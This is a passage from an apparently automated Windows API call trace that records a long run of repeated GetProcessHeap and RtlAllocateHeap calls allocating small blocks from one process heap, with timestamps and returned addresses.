RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x290840 [0126.888] GetProcessHeap () returned 0x270000 [0126.888] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x290890 [0126.888] GetProcessHeap () returned 0x270000 [0126.888] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x2908b0 [0126.888] GetProcessHeap () returned 0x270000 [0126.888] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x2908d0 [0126.888] GetProcessHeap () returned 0x270000 [0126.888] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x2908f0 [0126.888] GetProcessHeap () returned 0x270000 [0126.888] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x290910 [0126.888] GetProcessHeap () returned 0x270000 [0126.888] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x290930 [0126.888] GetProcessHeap () returned 0x270000 [0126.888] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x290950 [0126.888] GetProcessHeap () returned 0x270000 [0126.888] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x290970 [0126.888] GetProcessHeap () returned 0x270000 [0126.888] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x290990 [0126.888] GetProcessHeap () returned 0x270000 [0126.888] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x2909b0 [0126.888] GetProcessHeap () returned 0x270000 [0126.889] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x2909d0 [0126.889] GetProcessHeap () returned 0x270000 [0126.889] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x2909f0 [0126.889] GetProcessHeap () returned 0x270000 [0126.889] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x290a10 [0126.889] GetProcessHeap () returned 0x270000 [0126.889] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x290a30 [0126.889] GetProcessHeap () returned 0x270000 [0126.889] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x290a50 [0126.889] GetProcessHeap () returned 0x270000 [0126.889] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x290a70 [0126.889] GetProcessHeap () returned 0x270000 [0126.889] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x290a90 [0126.889] GetProcessHeap () returned 0x270000 [0126.889] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x290ab0 [0126.889] GetProcessHeap () returned 0x270000 [0126.889] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x290ad0 [0126.889] GetProcessHeap () returned 0x270000 [0126.889] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x290af0 [0126.889] GetProcessHeap () returned 0x270000 [0126.889] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x290b10 [0126.889] GetProcessHeap () returned 0x270000 [0126.889] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x290b30 [0126.889] GetProcessHeap () returned 0x270000 [0126.889] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x290b50 [0126.889] GetProcessHeap () returned 0x270000 [0126.889] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x290b70 [0126.889] GetProcessHeap () returned 0x270000 [0126.889] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x290b90 [0126.889] GetProcessHeap () returned 0x270000 [0126.889] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x290bb0 [0126.889] GetProcessHeap () returned 0x270000 [0126.889] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x290bd0 [0126.889] GetProcessHeap () returned 0x270000 [0126.889] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x290bf0 [0126.889] GetProcessHeap () returned 0x270000 [0126.889] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x290c10 [0126.889] GetProcessHeap () returned 0x270000 [0126.889] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x290c30 [0126.889] GetProcessHeap () returned 0x270000 [0126.890] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x290c50 [0126.890] GetProcessHeap () returned 0x270000 [0126.890] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x290c70 [0126.890] GetProcessHeap () returned 0x270000 [0126.890] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x290c90 [0126.890] GetProcessHeap () returned 0x270000 [0126.890] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x290cb0 [0126.890] GetProcessHeap () returned 0x270000 [0126.890] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x290cd0 [0126.890] GetProcessHeap () returned 0x270000 [0126.890] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x290cf0 [0126.890] GetProcessHeap () returned 0x270000 [0126.890] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x290d10 [0126.890] GetProcessHeap () returned 0x270000 [0126.890] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x290d30 [0126.890] GetProcessHeap () returned 0x270000 [0126.890] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x290d50 [0126.890] GetProcessHeap () returned 0x270000 [0126.890] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x290d70 [0126.890] GetProcessHeap () returned 0x270000 [0126.890] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x290d90 [0126.890] GetProcessHeap () returned 0x270000 [0126.890] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x290db0 [0126.890] GetProcessHeap () returned 0x270000 [0126.890] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x290dd0 [0126.890] GetProcessHeap () returned 0x270000 [0126.890] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x290df0 [0126.890] GetProcessHeap () returned 0x270000 [0126.890] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x290e10 [0126.890] GetProcessHeap () returned 0x270000 [0126.890] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x290e30 [0126.890] GetProcessHeap () returned 0x270000 [0126.890] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x290e50 [0126.890] GetProcessHeap () returned 0x270000 [0126.890] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x290e70 [0126.890] GetProcessHeap () returned 0x270000 [0126.890] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x290e90 [0126.891] GetProcessHeap () returned 0x270000 [0126.891] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x290eb0 [0126.891] GetProcessHeap () returned 0x270000 [0126.891] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x290ed0 [0126.891] GetProcessHeap () returned 0x270000 [0126.891] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x290ef0 [0126.891] GetProcessHeap () returned 0x270000 [0126.891] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x290f10 [0126.891] GetProcessHeap () returned 0x270000 [0126.891] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x290f30 [0126.891] GetProcessHeap () returned 0x270000 [0126.891] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x290f50 [0126.891] GetProcessHeap () returned 0x270000 [0126.891] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x290f70 [0126.891] GetProcessHeap () returned 0x270000 [0126.891] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x290f90 [0126.891] GetProcessHeap () returned 0x270000 [0126.891] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x290fb0 [0126.891] GetProcessHeap () returned 0x270000 [0126.891] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x290fd0 [0126.891] GetProcessHeap () returned 0x270000 [0126.891] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x290ff0 [0126.891] GetProcessHeap () returned 0x270000 [0126.891] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291010 [0126.891] GetProcessHeap () returned 0x270000 [0126.891] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291030 [0126.891] GetProcessHeap () returned 0x270000 [0126.891] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291090 [0126.891] GetProcessHeap () returned 0x270000 [0126.891] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x2910b0 [0126.891] GetProcessHeap () returned 0x270000 [0126.891] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x2910d0 [0126.891] GetProcessHeap () returned 0x270000 [0126.891] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x2910f0 [0126.891] GetProcessHeap () returned 0x270000 [0126.892] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291110 [0126.892] GetProcessHeap () returned 0x270000 [0126.892] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291130 [0126.892] GetProcessHeap () returned 0x270000 [0126.892] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291150 [0126.892] GetProcessHeap () returned 0x270000 [0126.892] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291170 [0126.892] GetProcessHeap () returned 0x270000 [0126.892] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291190 [0126.892] GetProcessHeap () returned 0x270000 [0126.892] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x2911b0 [0126.892] GetProcessHeap () returned 0x270000 [0126.892] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x2911d0 [0126.892] GetProcessHeap () returned 0x270000 [0126.892] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x2911f0 [0126.892] GetProcessHeap () returned 0x270000 [0126.892] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291210 [0126.892] GetProcessHeap () returned 0x270000 [0126.892] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291230 [0126.892] GetProcessHeap () returned 0x270000 [0126.892] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291250 [0126.892] GetProcessHeap () returned 0x270000 [0126.892] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291270 [0126.892] GetProcessHeap () returned 0x270000 [0126.892] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291290 [0126.892] GetProcessHeap () returned 0x270000 [0126.892] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x2912b0 [0126.892] GetProcessHeap () returned 0x270000 [0126.892] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x2912d0 [0126.892] GetProcessHeap () returned 0x270000 [0126.892] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x2912f0 [0126.892] GetProcessHeap () returned 0x270000 [0126.893] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291310 [0126.893] GetProcessHeap () returned 0x270000 [0126.893] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291330 [0126.893] GetProcessHeap () returned 0x270000 [0126.893] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291350 [0126.893] GetProcessHeap () returned 0x270000 [0126.893] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291370 [0126.893] GetProcessHeap () returned 0x270000 [0126.893] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291390 [0126.893] GetProcessHeap () returned 0x270000 [0126.893] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x2913b0 [0126.893] GetProcessHeap () returned 0x270000 [0126.893] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x2913d0 [0126.893] GetProcessHeap () returned 0x270000 [0126.893] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x2913f0 [0126.893] GetProcessHeap () returned 0x270000 [0126.893] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291410 [0126.893] GetProcessHeap () returned 0x270000 [0126.893] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291430 [0126.893] GetProcessHeap () returned 0x270000 [0126.893] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291450 [0126.893] GetProcessHeap () returned 0x270000 [0126.893] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291470 [0126.893] GetProcessHeap () returned 0x270000 [0126.893] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291490 [0126.893] GetProcessHeap () returned 0x270000 [0126.893] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x2914b0 [0126.893] GetProcessHeap () returned 0x270000 [0126.893] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x2914d0 [0126.893] GetProcessHeap () returned 0x270000 [0126.893] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x2914f0 [0126.893] GetProcessHeap () returned 0x270000 [0126.893] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291510 [0126.893] GetProcessHeap () returned 0x270000 [0126.894] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291530 [0126.894] GetProcessHeap () returned 0x270000 [0126.894] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291550 [0126.894] GetProcessHeap () returned 0x270000 [0126.894] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291570 [0126.894] GetProcessHeap () returned 0x270000 [0126.894] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291590 [0126.894] GetProcessHeap () returned 0x270000 [0126.894] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x2915b0 [0126.894] GetProcessHeap () returned 0x270000 [0126.894] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x2915d0 [0126.894] GetProcessHeap () returned 0x270000 [0126.894] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x2915f0 [0126.894] GetProcessHeap () returned 0x270000 [0126.894] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291610 [0126.894] GetProcessHeap () returned 0x270000 [0126.894] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291630 [0126.894] GetProcessHeap () returned 0x270000 [0126.894] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291650 [0126.894] GetProcessHeap () returned 0x270000 [0126.894] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291670 [0126.894] GetProcessHeap () returned 0x270000 [0126.894] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291690 [0126.894] GetProcessHeap () returned 0x270000 [0126.894] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x2916b0 [0126.894] GetProcessHeap () returned 0x270000 [0126.894] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x2916d0 [0126.894] GetProcessHeap () returned 0x270000 [0126.894] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x2916f0 [0126.894] GetProcessHeap () returned 0x270000 [0126.894] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291710 [0126.894] GetProcessHeap () returned 0x270000 [0126.894] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291730 [0126.894] GetProcessHeap () returned 0x270000 [0126.894] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291750 [0126.895] GetProcessHeap () returned 0x270000 [0126.895] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291770 [0126.895] GetProcessHeap () returned 0x270000 [0126.895] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291790 [0126.895] GetProcessHeap () returned 0x270000 [0126.895] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x2917b0 [0126.895] GetProcessHeap () returned 0x270000 [0126.895] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x2917d0 [0126.895] GetProcessHeap () returned 0x270000 [0126.895] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x2917f0 [0126.895] GetProcessHeap () returned 0x270000 [0126.895] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291810 [0126.895] GetProcessHeap () returned 0x270000 [0126.895] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291830 [0126.895] GetProcessHeap () returned 0x270000 [0126.895] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291890 [0126.895] GetProcessHeap () returned 0x270000 [0126.895] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x2918b0 [0126.895] GetProcessHeap () returned 0x270000 [0126.895] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x2918d0 [0126.895] GetProcessHeap () returned 0x270000 [0126.895] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x2918f0 [0126.895] GetProcessHeap () returned 0x270000 [0126.895] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291910 [0126.895] GetProcessHeap () returned 0x270000 [0126.895] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291930 [0126.895] GetProcessHeap () returned 0x270000 [0126.895] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291950 [0126.896] GetProcessHeap () returned 0x270000 [0126.896] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291970 [0126.896] GetProcessHeap () returned 0x270000 [0126.896] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291990 [0126.896] GetProcessHeap () returned 0x270000 [0126.896] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x2919b0 [0126.896] GetProcessHeap () returned 0x270000 [0126.896] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x2919d0 [0126.896] GetProcessHeap () returned 0x270000 [0126.896] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x2919f0 [0126.896] GetProcessHeap () returned 0x270000 [0126.896] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291a10 [0126.896] GetProcessHeap () returned 0x270000 [0126.896] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291a30 [0126.896] GetProcessHeap () returned 0x270000 [0126.896] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291a50 [0126.896] GetProcessHeap () returned 0x270000 [0126.896] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291a70 [0126.896] GetProcessHeap () returned 0x270000 [0126.896] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291a90 [0126.896] GetProcessHeap () returned 0x270000 [0126.896] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291ab0 [0126.896] GetProcessHeap () returned 0x270000 [0126.896] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291ad0 [0126.896] GetProcessHeap () returned 0x270000 [0126.896] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291af0 [0126.896] GetProcessHeap () returned 0x270000 [0126.896] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291b10 [0126.896] GetProcessHeap () returned 0x270000 [0126.896] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291b30 [0126.896] GetProcessHeap () returned 0x270000 [0126.896] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291b50 [0126.896] GetProcessHeap () returned 0x270000 [0126.896] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291b70 [0126.897] GetProcessHeap () returned 0x270000 [0126.897] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291b90 [0126.897] GetProcessHeap () returned 0x270000 [0126.897] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291bb0 [0126.897] GetProcessHeap () returned 0x270000 [0126.897] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291bd0 [0126.897] GetProcessHeap () returned 0x270000 [0126.897] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291bf0 [0126.897] GetProcessHeap () returned 0x270000 [0126.897] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291c10 [0126.897] GetProcessHeap () returned 0x270000 [0126.897] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291c30 [0126.897] GetProcessHeap () returned 0x270000 [0126.897] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291c50 [0126.897] GetProcessHeap () returned 0x270000 [0126.897] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291c70 [0126.897] GetProcessHeap () returned 0x270000 [0126.897] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291c90 [0126.897] GetProcessHeap () returned 0x270000 [0126.897] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291cb0 [0126.897] GetProcessHeap () returned 0x270000 [0126.897] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291cd0 [0126.897] GetProcessHeap () returned 0x270000 [0126.897] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291cf0 [0126.897] GetProcessHeap () returned 0x270000 [0126.897] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291d10 [0126.897] GetProcessHeap () returned 0x270000 [0126.897] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291d30 [0126.897] GetProcessHeap () returned 0x270000 [0126.897] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291d50 [0126.897] GetProcessHeap () returned 0x270000 [0126.897] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291d70 [0126.897] GetProcessHeap () returned 0x270000 [0126.897] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291d90 [0126.897] GetProcessHeap () returned 0x270000 [0126.897] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291db0 [0126.897] GetProcessHeap () returned 0x270000 [0126.897] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291dd0 [0126.897] GetProcessHeap () returned 0x270000 [0126.898] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291df0 [0126.898] GetProcessHeap () returned 0x270000 [0126.898] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291e10 [0126.898] GetProcessHeap () returned 0x270000 [0126.898] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291e30 [0126.898] GetProcessHeap () returned 0x270000 [0126.898] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291e50 [0126.898] GetProcessHeap () returned 0x270000 [0126.898] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291e70 [0126.898] GetProcessHeap () returned 0x270000 [0126.898] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291e90 [0126.898] GetProcessHeap () returned 0x270000 [0126.898] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291eb0 [0126.898] GetProcessHeap () returned 0x270000 [0126.898] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291ed0 [0126.898] GetProcessHeap () returned 0x270000 [0126.898] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291ef0 [0126.898] GetProcessHeap () returned 0x270000 [0126.898] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291f10 [0126.898] GetProcessHeap () returned 0x270000 [0126.898] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291f30 [0126.898] GetProcessHeap () returned 0x270000 [0126.898] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291f50 [0126.898] GetProcessHeap () returned 0x270000 [0126.898] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291f70 [0126.898] GetProcessHeap () returned 0x270000 [0126.898] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291f90 [0126.898] GetProcessHeap () returned 0x270000 [0126.898] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291fb0 [0126.898] GetProcessHeap () returned 0x270000 [0126.898] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291fd0 [0126.898] GetProcessHeap () returned 0x270000 [0126.898] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x291ff0 [0126.898] GetProcessHeap () returned 0x270000 [0126.898] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x292010 [0126.898] GetProcessHeap () returned 0x270000 [0126.898] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x292030 [0126.898] GetProcessHeap () returned 0x270000 [0126.898] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x292090 [0126.898] GetProcessHeap () returned 0x270000 [0126.898] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x2920b0 [0126.899] GetProcessHeap () returned 0x270000 [0126.899] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x2920d0 [0126.899] GetProcessHeap () returned 0x270000 [0126.899] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x2920f0 [0126.899] GetProcessHeap () returned 0x270000 [0126.899] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x292110 [0126.899] GetProcessHeap () returned 0x270000 [0126.899] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x292130 [0126.899] GetProcessHeap () returned 0x270000 [0126.899] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x292150 [0126.899] GetProcessHeap () returned 0x270000 [0126.899] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x292170 [0126.899] GetProcessHeap () returned 0x270000 [0126.899] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x292190 [0126.899] GetProcessHeap () returned 0x270000 [0126.899] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x2921b0 [0126.899] GetProcessHeap () returned 0x270000 [0126.899] RtlAllocateHeap 